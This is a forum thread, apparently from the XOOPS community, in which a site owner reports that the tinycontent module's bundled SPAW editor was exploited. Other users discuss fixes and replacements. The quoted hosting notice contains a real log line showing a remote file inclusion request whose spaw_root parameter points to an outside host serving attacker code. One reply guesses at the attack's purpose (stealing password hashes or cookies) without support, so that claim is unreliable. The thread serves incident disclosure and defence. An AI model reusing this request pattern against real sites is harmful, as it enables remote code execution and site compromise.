I have just received notice from my hosting provider that the tinycontent module in my installation was hacked and used to install software on my site. I am not qualified to determine if tinycontent is exploitable; I am recommending someone take a look at it.

Here is the info from my host:
------------------------------------------------------------------------------
Hello,

We need to inform you that your hosting account for [protected].com has been hacked and used to run illegal software on the server.

To prevent further abuse of your account and the server, we have disabled the following location on your account:

/home/[protected]/www/www/modules/tinycontent

Here is how the hackers have exploited your account:

62.193.230.18 - - [02/May/2007:12:31:16 +0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65

Please check the environmental variables of the process for your user:

PATH=/usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT=/home/[protected]/www/www
HTTP_CONNECTION=close
HTTP_HOST=www.[protected].com
HTTP_USER_AGENT=libwww-perl/5.65
REMOTE_ADDR=62.193.230.18
REMOTE_PORT=59296
SCRIPT_FILENAME=/home/[protected]/www/www/modules/tinycontent/admin/spaw/spaw_control.class.php
SERVER_ADDR=[protected]
SERVER_ADMIN=admin@[protected].com
SERVER_NAME=www.[protected].com
SERVER_PORT=80
SERVER_SOFTWARE=Apache
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
QUERY_STRING=spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
REQUEST_URI=/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cabulas.net/sky/sky/out2.txt?
SCRIPT_NAME=/modules/tinycontent/admin/spaw/spaw_control.class.php

Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.

When you are ready to secure your account, please contact us, and we will enable the access to the disabled directory.

Thank you!

It may be worth replacing TinyContent with either: TinyD or pico from http://xoops.peak.ne.jp/

(TinyD is a duplicatable module based on TinyContent, but Pico replaces TinyD as it has more features)

And I would also suggest looking at "Protector" from the above site as well.

Read about this known 2.0.16 bug info before install it!

bug 2.0.15/16

Quote:

I believe this is a good example of why allow_url_fopen can be dangerous

Quote:

This is an incompatibility between 2.0.15/2.0.16 and some of GiJoe's modules

What is 'spaw'? Is that an editor? If so, I think you can probably use a different one, or just use the default XOOPS editor.

Quote:

Yes, Spaw is a WYSIWYG editor - it hasn't been maintained separately for quite a while.

Just got this message from my webhost giving me essentially the same warning:



This is a XOOPS 2.2 site with protector installed. Looks like tinycontent might have to be removed from the module repository. It might also be a good idea to put a warning on the xoops.org homepage warning users.

Listen Man

There is no problem with your module tinycontent , your problem with the Editor Spaw . the one trys to hack you he is doing it by tring to either steal the admin Hash Password or Steal your Cookies . this kind of attack most uses aginst phpnuke .

its seems somone Got Bug discovered on SPAW and now he tring to use it with any module uses this Editor you just disable it from your admin panel then go to the module and open admin folder u will see SPAW folder sleeping there , Remove it and just use microsoft front page to edit whatever u want to wrap inside XOOPS then copy and past to the default editor comes with the module .

i never trusted Spaw editor becose i always felt somone can insert Java Code and hack me .

OK, I listened man, and I dig you, daddy-o But as long as the spaw editor is part of tinycontent, it's considered part of the module and its installation. In view of the recent attacks, I still think that a warning should be set up somewhere to alert members as well as the solution you provided.

Peace/Out